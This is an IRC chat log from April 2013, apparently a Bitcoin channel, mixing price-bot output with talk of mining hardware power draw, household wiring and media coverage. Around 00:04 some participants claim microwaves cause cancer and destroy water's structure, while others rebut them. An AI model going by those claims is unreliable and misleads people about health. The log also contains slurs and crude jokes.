21:46:32 yeah. Apr 16 21:46:54 I see 962 Apr 16 21:48:36 well, it just randomly changed for me also, now at 1100 Apr 16 21:49:24 back to showing 5300 Apr 16 21:49:48 ahahah Apr 16 21:49:52 ;;title https://www.youtube.com/watch?feature=player_detailpage&v=IbSOHwCOnG0#t=304s Apr 16 21:49:54 Keiser Report: Magic of Bitcoin Gathering (E432) - YouTube Apr 16 21:50:00 not for me Apr 16 21:50:40 is this a parody on MTG? Apr 16 21:50:59 Wow. I never actually watched Max. He really looks and sounds like a troll. Apr 16 21:51:04 like a real troll Apr 16 21:51:07 you never know with max keiser Apr 16 21:51:09 poe's law applies Apr 16 21:51:09 lol for real Apr 16 21:51:36 i wonder if he lives under a bridge, i notice there's a bridge in the background behind him Apr 16 21:52:47 who's got a bridge for sale? Apr 16 21:52:50 no cause he sold his coins in time :) Apr 16 21:53:29 pretty sure keiser pumped and dumped already Apr 16 21:53:35 can't listen to him anymore Apr 16 21:53:43 Selling bridge! Only 200000 BTC! Apr 16 21:53:51 i couldn't watch him for more than 10 seconds... Apr 16 21:53:54 Yeah, I'm sure he sold near the top Apr 16 21:53:57 he just looks and sounds retarded Apr 16 21:54:36 i have overlayed gollum on max keiser Apr 16 21:54:43 proportions match perfectly Apr 16 21:55:17 He looks like gollum, but with more hairs and not yet as skinny Apr 16 21:55:51 some of you already bought something on bitmit ? Apr 16 21:55:52 its still better than half of the shit you find outthere about bitcoin Apr 16 21:56:25 i need btc on my account before bidding or i can fill my account after & pay ? Apr 16 21:56:51 hmmm... gox is over 80% http://bitcoinity.org/markets/list?currency=ALL&span=24h Apr 16 21:57:00 I thought lower Apr 16 21:58:33 Scrat, maybe if Bitcoins dies one day, when all BTC are lost to lost keys, he'll have the last cascacius coin, the last bitcoin, saying "My Precious" Apr 16 21:59:58 "krugman is a complete bimbo" Apr 16 22:00:04 o lloky bitpay guy in the keiser show Apr 16 22:00:07 looky* Apr 16 22:00:19 he is everywhere Apr 16 22:00:24 Namworld :'( Apr 16 22:01:10 scrat, link us to gollum keiser? Apr 16 22:01:25 $vwap Apr 16 22:01:27 kakobrekla: http://pastebin.com/raw.php?i=Ji7dHBNm Apr 16 22:01:35 sorry I exited photoshop in disgust Apr 16 22:04:30 mtgox x232 3,021.3251 @ 68.73813904 USD Apr 16 22:08:00 [HAVELOCK] [VTX] 1 @ 0.51499989 BTC [+] Apr 16 22:13:39 also wtf "even if you were to take over the network people would see it comming....... you cant fllip a switch and take 51% of the network" Apr 16 22:13:42 is he retarded? Apr 16 22:13:44 srsly Apr 16 22:14:25 even the big stars get it wrong Apr 16 22:14:28 fucked Apr 16 22:15:48 [BTCTC] [S.MPOE-PT] 1 @ 0.000699 BTC [+] Apr 16 22:16:16 that is not what prisoners dilemma is all about - is it? Apr 16 22:16:19 kakobrekla who;s rthat ? Apr 16 22:16:27 sounds a lot like the internet is not like a truck argument. Apr 16 22:16:43 the bitpay dude Apr 16 22:16:46 on the keiser show Apr 16 22:16:58 ridiculous... Apr 16 22:17:14 does he really have a .ru email address? Apr 16 22:17:36 [15:13] also wtf "even if you were to take over the network people would see it comming....... you cant fllip a switch and take 51% of the network" Apr 16 22:17:54 Well... if someone were to do that... that's exactly how they'd do it. Apr 16 22:18:31 exactly Apr 16 22:18:35 thats how I'd do it if I wanted to Apr 16 22:18:38 critical level here Apr 16 22:18:45 and I'd leave the shit on just enough to make it work Apr 16 22:18:48 and then flip it back off Apr 16 22:19:17 luckly for us it doesnt matter what you would do Apr 16 22:19:52 actually, isn't hashing power now more concentrated than ever? Apr 16 22:20:07 yes Apr 16 22:20:10 pgp: wont be after asicminer unleashes a 200th load all over your face Apr 16 22:20:18 Mostly in ASICMINER's hands Apr 16 22:20:29 they'll reach 51% at this rate Apr 16 22:21:11 right - so... that doesn't seem so secure to me... Apr 16 22:21:31 that's the reason yifu started avalon, right? Apr 16 22:21:53 down we go... Apr 16 22:22:57 c'mon - sell, sell, sell! Apr 16 22:23:01 pgp yea. Apr 16 22:23:17 Namworld i think avalon is delivering. Apr 16 22:23:33 so, extrpolate into the future - how does the mining shit play out? Apr 16 22:24:28 good Apr 16 22:24:32 going to add some balance Apr 16 22:24:44 BFL failed at that Apr 16 22:25:33 i imagine more people will make more chips. Apr 16 22:25:52 [MPEX] [S.MPOE] 3975 @ 0.00070239 = 2.792 BTC [+] Apr 16 22:25:53 [MPEX] [S.MPOE] 2925 @ 0.0006891 = 2.0156 BTC [-] Apr 16 22:26:01 then the cheapest electricity qina Apr 16 22:26:06 *wins Apr 16 22:27:29 watch out below Apr 16 22:27:35 ;;ticker Apr 16 22:27:36 BTCUSD ticker | Best bid: 65.94000, Best ask: 66.00100, Bid-ask spread: 0.06100, Last trade: 66.30000, 24 hour volume: 664521.94526845, 24 hour low: 50.01000, 24 hour high: 91.00000, 24 hour vwap: 68.15425 Apr 16 22:30:00 [HAVELOCK] [SDICE] 2 @ 0.366 = 0.732 BTC [-] Apr 16 22:30:14 to good to be true? https://cloudhashing.com/contracts/indefinite-contracts Apr 16 22:30:50 Using our powerful ASIC cloud, we simplify the mining process for you. Apr 16 22:31:00 Luke-Jr: pingh Apr 16 22:31:11 ? Apr 16 22:31:24 jcpham sounds like it. Apr 16 22:31:32 luke-jr what do think about this cloudhashing scam Apr 16 22:31:41 I'd say, yeah, sounds too good to be true, jcpham. Apr 16 22:31:41 Luke-Jr: can you by any chance do hardware based c coding? Apr 16 22:31:43 i can't get behind their economic model Apr 16 22:31:49 jcpham: even if it weren't a scam, it defeats the point of mining even more than centralized pools Apr 16 22:31:56 alex1234567: what? Apr 16 22:32:07 Luke-Jr: programming chips etc Apr 16 22:32:09 doesn't seem any worse than asicminer Apr 16 22:32:24 jcpham: well, ASICMiner has the same problem Apr 16 22:32:26 had* Apr 16 22:35:55 ;;bids 0 Apr 16 22:35:57 There are currently 1.0566017e+09 bitcoins demanded at or over 0.0 USD, worth 11861233.5045 USD in total. | Data vintage: 0.0078 seconds Apr 16 22:36:09 I switched gribble to e+ numbers Apr 16 22:36:44 noooooo Apr 16 22:36:46 Of all bids, Me: 1 billion, Rest of the world: 56.6 millions Apr 16 22:36:54 I won Apr 16 22:37:08 thats hideous Apr 16 22:37:09 Where's my trophy for stupid achievements Apr 16 22:37:19 8==D Apr 16 22:38:04 8==D ~o ~o ~o on your e+ Apr 16 22:38:28 ~° Apr 16 22:38:47 American Airlines DDOS? http://www.aa.com/homePage.do Apr 16 22:39:04 unlikely I'm sure Apr 16 22:40:04 ;;asks 100 Apr 16 22:40:05 There are currently 62882.521 bitcoins offered at or under 100.0 USD, worth 5473189.36504 USD in total. | Data vintage: 84.2062 seconds Apr 16 22:40:12 ;;bids 0 Apr 16 22:40:12 There are currently 1.0566017e+09 bitcoins demanded at or over 0.0 USD, worth 11859030.3747 USD in total. | Data vintage: 91.7733 seconds Apr 16 22:40:28 so lame Apr 16 22:41:00 there is something else with AA, they asked the FAA to ground all the flights? Apr 16 22:41:03 ;;bids 1 Apr 16 22:41:05 There are currently 710752.61 bitcoins demanded at or over 1.0 USD, worth 11622897.2427 USD in total. | Data vintage: 0.0074 seconds Apr 16 22:41:21 :/ Apr 16 22:42:55 bear sperm ~. Apr 16 22:43:01 bull sperm ~° Apr 16 22:43:18 ok ill go away now Apr 16 22:44:30 It's not lame. I represent like 95% of the bids orderbook in BTC denomination now. Apr 16 22:45:20 ;;bids 0 Apr 16 22:45:20 There are currently 1.0565969e+09 bitcoins demanded at or over 0.0 USD, worth 11854275.4436 USD in total. | Data vintage: 107.0922 seconds Apr 16 22:45:24 hmm... Apr 16 22:45:24 [MPEX] [S.MPOE] 6800 @ 0.00070244 = 4.7766 BTC [+] Apr 16 22:45:56 i hope you made the orders in .001 btc increments. Apr 16 22:46:20 0.01BTC minimum lol =P Apr 16 22:46:30 Would have been fun actually Apr 16 22:47:03 0.00001 USD minimum bid... 0.0000001 cost per bid Apr 16 22:47:12 Well that would have killed gox's engine Apr 16 22:47:41 I am assuming SD is undergoin a DDOS attack now Apr 16 22:48:23 ;;bids 0 Apr 16 22:48:24 There are currently 1.0565969e+09 bitcoins demanded at or over 0.0 USD, worth 11830042.4309 USD in total. | Data vintage: 11.4155 seconds Apr 16 22:48:33 hey, I removed the order... Apr 16 22:48:36 slow gribble Apr 16 22:53:09 assbot Apr 16 22:53:40 ;;bids 0 Apr 16 22:53:42 There are currently 56594480 bitcoins demanded at or over 0.0 USD, worth 11572274.4877 USD in total. | Data vintage: 0.0086 seconds Apr 16 22:53:49 back to 56 million demand Apr 16 22:53:58 There ya go ThickAsThieves Apr 16 22:54:06 thank yo sir Apr 16 22:54:16 i just think the E concept is tarded Apr 16 22:54:28 Not my fault gribble does it Apr 16 22:54:53 i suppose it has real purpose in larger math Apr 16 22:55:06 but not for me :) Apr 16 22:56:36 can't gribble be formatted with 000 seperator Apr 16 22:58:34 not without complaining to the right person Apr 16 22:58:44 who is that? Apr 16 22:59:01 E is preferred Apr 16 22:59:08 learn math Apr 16 22:59:27 lol Apr 16 23:00:43 HEH Apr 16 23:00:45 i didnt see anyone fighting for the e Apr 16 23:02:13 in that example it only obfuscates anyway Apr 16 23:05:09 [BTCTC] [ASICMINER-PT] 1 @ 0.85397 BTC [+] Apr 16 23:05:18 [BTCTC] [ASICMINER-PT] 1 @ 0.85398 BTC [+] Apr 16 23:06:39 http://www.nextnewdeal.net/rortybomb/researchers-finally-replicated-reinhart-rogoff-and-there-are-serious-problems Apr 16 23:07:23 another nice feature would be something like ;;depth 40% where it give ;;bids last*(1-.4) and ;;asks last*(1+.4) Apr 16 23:07:45 [BTCTC] [B.YABMC] 1 @ 0.01299 BTC [+] Apr 16 23:07:50 [BTCTC] [B.YABMC] 1 @ 0.013 BTC [+] Apr 16 23:07:53 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [+] Apr 16 23:07:56 [BTCTC] [B.YABMC] 8 @ 0.014898 = 0.1192 BTC [+] Apr 16 23:08:00 [BTCTC] [B.YABMC] 100 @ 0.014899 = 1.4899 BTC [+] Apr 16 23:08:27 hmm Apr 16 23:08:32 interesting idea Apr 16 23:10:12 ;;bids 0.9 Apr 16 23:10:14 There are currently 722721.79 bitcoins demanded at or over 0.9 USD, worth 11548332.3198 USD in total. | Data vintage: 0.0095 seconds Apr 16 23:12:27 [BTCTC] [ASICMINER-PT] 1 @ 0.85398 BTC [+] Apr 16 23:12:31 [BTCTC] [ASICMINER-PT] 2 @ 0.854 = 1.708 BTC [+] Apr 16 23:12:39 [BTCTC] [ASICMINER-PT] 8 @ 0.85999 = 6.8799 BTC [+] Apr 16 23:12:45 [BTCTC] [ASICMINER-PT] 1 @ 0.8649 BTC [+] Apr 16 23:12:54 [BTCTC] [ASICMINER-PT] 3 @ 0.87387 = 2.6216 BTC [+] Apr 16 23:13:15 [MPEX] [S.MPOE] 11500 @ 0.00069338 = 7.9739 BTC [-] Apr 16 23:15:47 http://www.forbes.com/sites/steveforbes/2013/04/16/bitcoin-whatever-it-is-its-not-money/ Apr 16 23:17:08 duh. Apr 16 23:17:52 in other news, http://o.onionstatic.com/images/5/5425/original/700.hq.jpg?2506 Apr 16 23:19:14 Money is most optimal when it is fixed in value just as commerce is facilitated when we have fixed weights and measures. When you buy a pound of hamburger you expect to get 16 ounces of meat. An hour has 60 minutes. A mile has 5280 feet. These measurements don’t “float.” Apr 16 23:19:38 wait, an ounce floats, right? Apr 16 23:19:47 that's forbes staff btw Apr 16 23:19:52 not the bloggers Apr 16 23:19:53 that's actually forbes. Apr 16 23:19:58 yeah. Apr 16 23:20:04 Malcolm Stevenson Apr 16 23:20:16 A mile has 5280 feet < lol Apr 16 23:20:26 what a retarded measurement system Apr 16 23:20:37 using that to make a point Apr 16 23:20:39 damn your decimals! Apr 16 23:20:56 anyway, the usual set of ignorant/half informed nonsense people do these days Apr 16 23:21:03 im getting kind of meh'd even considering it. Apr 16 23:21:22 dawwww i like seeing these old smart people look dumb Apr 16 23:21:25 "our currency collapsed against this thing therefore this thing can't be used to price hamburgers in" Apr 16 23:21:28 whoop de doo. logic. Apr 16 23:22:01 the fact that the dollar is insanely volatile these days has little bearing on anything other than... the dollar itself. Apr 16 23:23:20 666k 224h gox volume... Apr 16 23:24:35 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19889 BTC [+] Apr 16 23:24:37 [BTCTC] [BTC-BOND] 1000 @ 0.01 = 10 BTC [+] Apr 16 23:24:48 mircea_popescu, you do a good job of chronicling those articles or instances of great stupidity. please keep this steve forbes article in your archives for future reference Apr 16 23:25:28 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1989 = 0.5967 BTC [+] Apr 16 23:25:43 lol Apr 16 23:25:54 people just want my BTC-BOND, do they? Apr 16 23:27:17 im not gonna. guy's entitled to being stupid ocasionalyl, he has a name. Apr 16 23:27:37 I was recalling it because price was rising too much in my taste. Now I put it back available and people buy. Apr 16 23:29:03 looks like it is going to be approx 300w for a single, whenif they show up Apr 16 23:29:48 8800w for a minirig, even though those are not shipping Apr 16 23:31:59 8.8 kW wtf Apr 16 23:33:24 warm! Apr 16 23:33:45 most US homes/places of business aren't wired for that Apr 16 23:33:48 not even remotely Apr 16 23:34:51 so when do they pay the 1k btc chairty bet? Apr 16 23:35:02 that can't be serious Apr 16 23:35:07 source? Apr 16 23:36:20 apparently he forgot to delete this one too https://forums.butterflylabs.com/article-comments/182-article-bfl-offers-1000-btc-charity-if-we-miss-our-power-targets.html Apr 16 23:36:32 wow Apr 16 23:36:44 https://forums.butterflylabs.com/content/123-bfl-offers-1000-btc-charity-if-they-miss-their-power-targets-comments4.html Apr 16 23:37:08 up front investment to support power usage Apr 16 23:37:39 ok Apr 16 23:37:40 https://bitcointalk.org/index.php?topic=119338.0 Apr 16 23:37:42 here it is Apr 16 23:37:52 not deleted Apr 16 23:38:01 maybe im jumpy Apr 16 23:38:13 that power draw is as correct as far as I know Apr 16 23:38:34 jborkl that's an insane number for a minirig Apr 16 23:38:34 consistent with what has been said Apr 16 23:38:50 I am not saying it is not insance Apr 16 23:38:56 insane Apr 16 23:39:06 just relaying the news Apr 16 23:39:16 yeah i know my bad Apr 16 23:39:23 those fuckers at bfl are batshit Apr 16 23:40:02 people are going to have to deal with heat, power , proper cooling, babysitting Apr 16 23:40:09 and that is without a host Apr 16 23:40:11 it would need 7 power cords going to maxxed out terminal is a US home Apr 16 23:40:22 more likely 220v though Apr 16 23:40:30 no clue what sort of support you'd need for that Apr 16 23:40:44 i bet i ask an electrician tomorrow though Apr 16 23:40:48 I have places for all of mine, already drawing a bunch from GPU's Apr 16 23:40:59 480v with a transformer Apr 16 23:41:01 then we'll shart to hear the stories of how the bfl asics catch on fire... Apr 16 23:41:08 so 480v Apr 16 23:41:10 did someone say 480v? Apr 16 23:41:24 that's new service from the electric co for most people Apr 16 23:41:35 well Apr 16 23:41:37 its industrial service Apr 16 23:41:48 yeah residential gtfo Apr 16 23:41:56 240v is usually what comes down off the poles and then its phase split into two 120vs Apr 16 23:42:04 oh wow... the quote: "We don’t really know how this coin is created. You can’t have a functional money without a basic transparency." Apr 16 23:42:19 Namworld: what? Apr 16 23:42:56 http://www.forbes.com/sites/steveforbes/2013/04/16/bitcoin-whatever-it-is-its-not-money/ Apr 16 23:43:07 is terrible don't read it Apr 16 23:43:08 oh fucking forbes Apr 16 23:43:13 no one even listens to their shit anymore Apr 16 23:43:23 it's steven himself Diablo-D3 Apr 16 23:43:46 steven forbes doesnt actually exist Apr 16 23:43:51 its a persona made up by the company Apr 16 23:43:53 apparently the blockchain and mining is totally opaque Apr 16 23:46:22 lol does the 10kw include the fans ? Apr 16 23:46:32 yikes Apr 16 23:46:36 i bet it doesn't Apr 16 23:46:45 [BTCTC] [ASICMINER-PT] 2 @ 0.87 = 1.74 BTC [-] Apr 16 23:47:09 lol, I bet it does not either Apr 16 23:47:22 [BTCTC] [ASICMINER-PT] 2 @ 0.87387 = 1.7477 BTC [+] Apr 16 23:47:53 you would also need a pretty big ventilation to draw out that heat Apr 16 23:48:03 [BTCTC] [ASICMINER-PT] 5 @ 0.87389 = 4.3695 BTC [+] Apr 16 23:48:31 [BTCTC] [ASICMINER-PT] 1 @ 0.89997 BTC [+] Apr 16 23:49:07 it's no good all-around Apr 16 23:49:28 http://petercearle.com/2013/04/the-following-exchange/ Apr 16 23:49:39 i'm making friends Apr 16 23:49:41 they were selling a 1.5 kW plug it in anywhere device Apr 16 23:49:42 [BTCTC] [ASICMINER-PT] 5 @ 0.89998 = 4.4999 BTC [+] Apr 16 23:49:43 unless you can use it to reduce you're heating bill in the winter... Apr 16 23:49:52 >1.5KW device Apr 16 23:49:54 on 120v? Apr 16 23:49:56 [BTCTC] [ASICMINER-PT] 1 @ 0.89999 BTC [+] Apr 16 23:50:06 [BTCTC] [ASICMINER-PT] 8 @ 0.925 = 7.4 BTC [+] Apr 16 23:50:08 i thought the minirgis came in under 1.5 Apr 16 23:50:17 tbh i don't know how you can get 10kW installed comercially. Apr 16 23:50:19 because that might not pass federal requirements Apr 16 23:50:26 i mean... i think you need your own transformer. Apr 16 23:50:30 mircea_popescu: pretty much you call up the power company and ask Apr 16 23:50:41 I have my own , but I am commercial Apr 16 23:50:45 it is big Apr 16 23:50:46 Diablo-D3 around here you can get 380V triphase installed just on asking Apr 16 23:50:53 well the point is the minirig was a consumer device but now it seems commercial Apr 16 23:50:55 but it won't carry more than about 6kw i don't think Apr 16 23:51:10 mircea_popescu: I think you're missing the concept Apr 16 23:51:13 on the upside it costs < 1k to have it put in Apr 16 23:51:17 volts * amps = watts Apr 16 23:51:23 yea ? Apr 16 23:51:33 you told me volts and watts but not amps. Apr 16 23:51:53 380v triphase can handle 6kw, it just depends entirely what your amperage is Apr 16 23:51:56 yes well... eu residential power is 220 v and < 20 amps Apr 16 23:52:07 thats per circuit, mircea_popescu Apr 16 23:52:10 commercially you can get (easily) 380 volts and i think it carries about 120 amps max Apr 16 23:52:14 you have 40, 60, 80, whatever amps coming into your house Apr 16 23:52:15 yeah i'm saying like home wiring can't even handle it Apr 16 23:52:20 Diablo-D3 you have 20. Apr 16 23:52:23 20 amp 30 amp max Apr 16 23:52:35 mircea_popescu: I said into the house, as in, for all the cirucits Apr 16 23:52:40 yes. Apr 16 23:52:51 you have a shitty house if you only have 2 circuits Apr 16 23:53:05 120v in the US is typically 15a, 18a max Apr 16 23:53:08 20 amps at 220 volts is over 4kw, which is considered sufficient Apr 16 23:53:11 Tesla's home single charger is 240v/40A/10kW Apr 16 23:53:22 Their dual is 240v/80A/20kW Apr 16 23:53:23 Bugpowder: depends which one, you CAN buy superchargers for home use Apr 16 23:53:25 so it can be done Apr 16 23:53:40 240 works w/ the 80AMP Apr 16 23:53:47 its just going to be fun talking your electric company into doing it Apr 16 23:53:49 inside wiring can't handle 80 Apr 16 23:53:54 yeah what jcpham said Apr 16 23:54:18 it's to much. you have to build the facility to house 8.8kW Apr 16 23:54:27 looks like $2000 plus installation costs Apr 16 23:54:27 right the opossite of what they initially sold Apr 16 23:54:35 I have 6 or 7 120v circuits, and 6 240v 30a circuits Apr 16 23:54:38 jcpham soubnds like it. Apr 16 23:54:39 and this is a small apartment. Apr 16 23:54:56 you are wired sir Diablo-D3 Apr 16 23:55:11 I think 120v 40a actually goes into the circuit breaker box though Apr 16 23:55:15 Diablo-D3 there is no way you can draw 40kw off your apt grid right now. Apr 16 23:55:22 (the 240s are double 120 breakers) Apr 16 23:55:38 mircea_popescu: of course not Apr 16 23:55:42 it'd be fun to try though Apr 16 23:55:45 i've got 2 meters, 4 acres and 5 buildings and i think i only have one 240 drop to each meter Apr 16 23:55:49 it'd be arson to try. Apr 16 23:56:01 even on copper wiring, calc the heat. Apr 16 23:56:16 jcpham sounds more like it. Apr 16 23:56:33 anyhow, you said 360v at 120 amps? Apr 16 23:56:46 europe has 220 and 380 Apr 16 23:56:57 Seems like you can get 90A in your garage, if you pay an electrician. http://webarchive.teslamotors.com/display_data/home_connector_installation.pdf Apr 16 23:57:01 you do realize thats 45.6kw right? Apr 16 23:57:01 and 120 is i think nomional max. you won't get it more than you get 1mbps internet or w/e Apr 16 23:57:08 ;;calc 8800\360 Apr 16 23:57:08 Error: unexpected character after line continuation character (, line 1) Apr 16 23:57:10 Diablo-D3 it also is a commercial installation. Apr 16 23:57:13 ;;calc 8800/360 Apr 16 23:57:13 24.4444444444 Apr 16 23:57:20 30 amp Apr 16 23:57:22 i can't follow, where are these kilowatts announced? Apr 16 23:57:23 mircea_popescu: yeah but you were trying to put 6kw on it Apr 16 23:57:38 i was discussing normal house wiring. which is about 4kw tops. Apr 16 23:57:56 Bugpowder: btw, yes, due to what tesla is doing, you can now get higher end chargers installed Apr 16 23:58:01 4kw tops but you aren't going to be using 120v at that point Apr 16 23:58:05 220! Apr 16 23:58:09 yeah Apr 16 23:58:12 Bugpowder: they'll work with your electric company to get it done for you Apr 16 23:58:16 look! europe has residential 220 v / 20 amp power Apr 16 23:58:24 mircea_popescu: yeah, europe is weird Apr 16 23:58:29 and 380v triphase at about 100+ amps, which you have to install speciallly. Apr 16 23:58:47 you just need thicker wires Apr 16 23:58:47 jurov: well, kind of Apr 16 23:58:55 i think europe requires 380 or multiple 220v drops Apr 16 23:58:58 you need LESS copper as voltage goes up to maintain the same wattage Apr 16 23:58:59 this is what you can do out of the box pretty much. otherwise you have to get on the list for a transform station being builrt Apr 16 23:59:04 which is i think half a year lead time Apr 16 23:59:23 surely bfl does intend to ship a device drawing more than 4kW Apr 16 23:59:25 surely not Apr 16 23:59:29 that's be stupid Apr 16 23:59:34 *doesn't Apr 16 23:59:38 well if they do it [retty much won't run in yurp Apr 16 23:59:52 it wont run in the US either Apr 16 23:59:56 or rural us, or asia, or anywhere else. Apr 16 23:59:59 we dont have 240v sockets typically Apr 17 00:00:00 dunno where it runs Apr 17 00:00:10 (electric driers being the exception) Apr 17 00:00:10 unless you build it Apr 17 00:00:18 no, they said the minirig will not be shipped as is Apr 17 00:00:26 such device can't ever get certified, at least not for home use Apr 17 00:00:27 so basically bfl miners will be near streams. Apr 17 00:00:28 why are we talking about BFL anyhow? Apr 17 00:00:33 bfl will never ship Apr 17 00:00:37 hahaha Apr 17 00:00:42 2 more weeks Diablo-D3 Apr 17 00:00:48 what, still 2 weeks ? Apr 17 00:00:48 just 2 more weeks Apr 17 00:00:52 Ovens are 240 Apr 17 00:01:04 2 more weeks until Im proven right? again? for the 6th time? Apr 17 00:01:20 ;;calc 4000/240 Apr 17 00:01:21 16.6666666667 Apr 17 00:01:27 we'll also have flying cars in 2 years. it has always been 2 years Apr 17 00:01:32 Bugpowder: they're hardwired, so are hotwater heaters and large enough air conditioning and whatever else that big Apr 17 00:01:39 Bugpowder: the only exception is dryers Apr 17 00:01:41 Bugpowder ya like a pizza oven. but that's commercial power grid Apr 17 00:01:43 that would be about like putting 30 7970's in a desktop case Apr 17 00:02:03 you don't have 4kw microwaves for residential use Apr 17 00:02:15 anyway Apr 17 00:02:26 no, because it'd destroy food Apr 17 00:02:31 actually 4kw microwave oven would be interesting Apr 17 00:02:40 even 1200w is a bit high Apr 17 00:02:55 i have a 1200 and it destroys water Apr 17 00:03:29 microwave trips breaker if i'm bein ghonest Apr 17 00:03:48 its kinda funny, ever since I went paleo I dont use my microwave much Apr 17 00:03:50 destroys? as in, emits hydrogen fumes? Apr 17 00:04:03 i've never used a microwave, nor do i intend to. Apr 17 00:04:09 also i have them removed from anywhere i go Apr 17 00:04:20 they give you awesome cancers Apr 17 00:04:23 don't frequent cafes that use them etc. i'm like the mcirowave enemy. Apr 17 00:04:47 they destroy the structure of food & water Apr 17 00:05:19 water has structure ? Apr 17 00:05:24 plants fed microwaved water will wither and die Apr 17 00:05:33 molecular sturcture Apr 17 00:05:34 srsly ?! Apr 17 00:05:39 yah Apr 17 00:05:44 i never heard that one before. Apr 17 00:05:47 turn brown like they burned Apr 17 00:05:59 sounds like pseudo science Apr 17 00:06:01 i'm trying it Apr 17 00:06:03 http://www.snopes.com/science/microwave/plants.asp Apr 17 00:06:06 snopes says not so Apr 17 00:06:16 snopes is quite full of crap Apr 17 00:06:17 microwaves split atoms, Apr 17 00:06:20 ? Apr 17 00:06:30 they're regularly debunked themselves Apr 17 00:06:40 jborkl nah Apr 17 00:06:55 I know, just lo at the myth Apr 17 00:06:58 lol Apr 17 00:07:30 raytheon developed the first microwave Apr 17 00:07:47 friedcat auctionning some block erupter blades(!) Apr 17 00:07:48 https://bitcointalk.org/index.php?topic=178275.0 Apr 17 00:07:49 certainly weaponized in every home Apr 17 00:07:50 microwaves make water molecules rotate between their natural magnetic poles really fast, that produces heat. The microwaves do not linger, nor do they travel more than four feet. Apr 17 00:08:32 i mean i'm not saying stand with your ball in front of one with the door open... Apr 17 00:08:42 raytheon? really...crazy Apr 17 00:08:51 what the fuck are you guys talking about Apr 17 00:08:56 structure of water Apr 17 00:09:08 lol market is boring Apr 17 00:09:17 for a minute Apr 17 00:09:23 microwaves don't change the structure of water. Apr 17 00:09:43 they don't cause cancer Apr 17 00:10:30 they just make water vibrate due to the excitation wavelength of H20 Apr 17 00:10:34 Bugpowder i can see a case for where whatever container leaks whatever poison in the microwave but not otherwise. Apr 17 00:10:37 i've got cancer and i've been drinking water for years Apr 17 00:10:54 mircea_popescu: that is plausibe Apr 17 00:11:00 not saying it's the case. Apr 17 00:11:06 container leaching Apr 17 00:11:07 sure Apr 17 00:11:13 people are scared of that with BPA Apr 17 00:11:17 [MPEX] [S.MPOE] 6200 @ 0.00069338 = 4.299 BTC [-] Apr 17 00:11:17 and microwaves Apr 17 00:11:18 [MPEX] [S.MPOE] 3938 @ 0.00068912 = 2.7138 BTC [-] Apr 17 00:11:23 [MPEX] [S.MPOE] 2000 @ 0.00068911 = 1.3782 BTC [-] Apr 17 00:11:23 im kinda meh with teflon for the same reason. Apr 17 00:11:23 possibly an issue for kids Apr 17 00:11:25 that'll cause cancer without the microwave for that matter Apr 17 00:11:39 i mean it's a great fucking thing but you jhave to always be carefgul not get it too hot in the end why even bother Apr 17 00:12:09 Le Cruset enameled cast iron Apr 17 00:12:18 i wouldn't trust the enamel. Apr 17 00:12:19 is the tites Apr 17 00:12:22 Bugpowder: there you go Apr 17 00:12:25 you can just fat cure a proper iron pot. Apr 17 00:12:37 much better idea IMO Apr 17 00:13:32 they are pretty though Apr 17 00:13:37 and easier to clean Apr 17 00:13:45 but yes I have a standard Lodge too Apr 17 00:13:57 cast iron pots are great for domestic arguments too Apr 17 00:15:00 lol I thought you were good at risk management mircea_popescu Apr 17 00:15:12 famous last words. Apr 17 00:20:33 well, that auction quickly got out of control Apr 17 00:20:52 [MPEX] [S.MPOE] 3550 @ 0.00068517 = 2.4324 BTC [-] Apr 17 00:21:22 still way too cheap Apr 17 00:21:32 this is only a few minutes into it Apr 17 00:21:54 and already 10gh for $1750 Apr 17 00:22:31 google is useless. i search for Claire Dupray nue, it gives me ashley dupre topless. Apr 17 00:22:35 who the fuck is ashely dupre even Apr 17 00:23:26 fucked spitzer Apr 17 00:23:46 she basically kept all the US bankers out of prison Apr 17 00:23:52 a Apr 17 00:23:55 mircea_popescu: lady looks like a dude Apr 17 00:24:10 i recall now, the kristen girl Apr 17 00:31:11 ;;ticker Apr 17 00:31:14 BTCUSD ticker | Best bid: 67.20000, Best ask: 67.80000, Bid-ask spread: 0.60000, Last trade: 67.80000, 24 hour volume: 651382.74660769, 24 hour low: 50.01000, 24 hour high: 84.50000, 24 hour vwap: 67.02669 Apr 17 00:31:17 ;;seen smickles Apr 17 00:31:19 smickles was last seen in #bitcoin-assets 1 week, 5 days, 5 hours, 48 minutes, and 48 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 17 00:31:51 ;;next Apr 17 00:31:53 expecting to test 70 resistance | targets if 70 broken: 80, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 19:35 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 hour, 56 minutes, and 54 seconds ago Apr 17 00:32:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19899 BTC [+] Apr 17 00:34:43 https://bitcointalk.org/index.php?topic=178275.0 Apr 17 00:34:44 nice Apr 17 00:41:15 Anyone else able/ready to sell some PUTs? Apr 17 00:41:19 [MPEX] [S.MPOE] 2050 @ 0.00068517 = 1.4046 BTC [-] Apr 17 00:41:21 [MPEX] [S.MPOE] 900 @ 0.00068457 = 0.6161 BTC [-] Apr 17 00:41:26 [MPEX] [S.MPOE] 10650 @ 0.00068433 = 7.2881 BTC [-] Apr 17 00:48:05 [BTCTC] [BASIC-MINING] 1 @ 0.422 BTC [-] Apr 17 00:48:29 [BTCTC] [BASIC-MINING] 1 @ 0.420011 BTC [-] Apr 17 00:50:58 mircea_popescu: deposits pls Apr 17 00:57:00 [MPEX] [S.DICE] 1650 @ 0.00380876 = 6.2845 BTC [+] Apr 17 00:59:18 [BTCTC] [BTC-BOND] 671 @ 0.01 = 6.71 BTC [+] Apr 17 01:02:27 [MPEX] [S.MPOE] 764 @ 0.00068668 = 0.5246 BTC [+] Apr 17 01:02:50 [BTCTC] [ASICMINER-PT] 1 @ 0.8608 BTC [-] Apr 17 01:03:14 [BTCTC] [ASICMINER-PT] 8 @ 0.86 = 6.88 BTC [-] Apr 17 01:03:58 [BTCTC] [ASICMINER-PT] 1 @ 0.85101 BTC [-] Apr 17 01:04:22 [BTCTC] [ASICMINER-PT] 4 @ 0.851 = 3.404 BTC [-] Apr 17 01:07:49 Some people are buying BTC-BOND Apr 17 01:07:53 a whole lot Apr 17 01:09:34 I didn't know there was such a high demand Apr 17 01:09:51 man I 